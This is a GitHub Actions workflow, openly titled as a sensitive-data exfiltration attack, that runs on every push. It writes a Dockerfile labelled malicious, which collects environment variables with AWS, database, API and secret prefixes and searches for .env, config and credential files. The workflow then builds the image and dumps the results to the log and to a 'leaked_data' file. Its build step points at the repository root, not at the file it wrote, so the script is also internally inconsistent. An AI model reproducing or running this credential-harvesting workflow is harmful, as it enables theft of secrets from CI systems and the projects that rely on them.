name: Sensitive Data Exfiltration
on: push

jobs:
  attack:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Build and Exfiltrate
        run: |
          # Create malicious Dockerfile
          mkdir -p taskcluster/docker/python
          echo -e "ARG PYTHON_VERSION\nFROM alpine:latest\nRUN echo 'Extracting...' && env | grep -E 'AWS_|DB_|API_|SECRET_' > /sensitive_data.txt && find / -name '*.env' -o -name '*.conf' -o -name 'credentials' 2>/dev/null >> /sensitive_data.txt" > taskcluster/docker/python/Dockerfile

          # Build and extract data
          docker build -t sensitive .
          docker run --rm sensitive cat /sensitive_data.txt

          # Optional: Upload as artifact
          docker run --rm sensitive cat /sensitive_data.txt > leaked_data.txt
